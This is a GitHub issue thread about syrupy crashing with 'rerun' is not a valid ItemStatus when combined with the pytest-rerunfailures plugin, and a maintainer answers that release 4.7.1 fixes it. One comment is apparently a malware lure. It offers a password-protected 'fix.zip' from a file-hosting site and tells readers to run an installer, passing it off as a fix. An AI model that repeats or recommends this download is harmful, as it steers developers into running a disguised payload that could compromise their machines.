### ISSUE TITLE
Add support for pytest-rerunfailures plugin

### ISSUE THREAD

**Issue by vhive-nir-lederfein** [syrupy-project/syrupy#885]
**Is your feature request related to a problem? Please describe.**

when using both the syrupy-project and pytest-rerunfailures plugin, I get an internal error: "ValueError: 'rerun' is not a valid ItemStatus" when a test fails

**Describe the solution you'd like**

either add "rerun" to the enum that will have a similar behavior to failure or have a fallback behavior for unsupported test run results

**Describe alternatives you've considered**

not using the plugin

**Additional context**

python version 3.11.9
syrupy==4.6.4
pytest-rerunfailures==14.0
Windows 11

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by noahnu** [comment]
This is fixed in https://github.com/syrupy-project/syrupy/releases/tag/v4.7.1
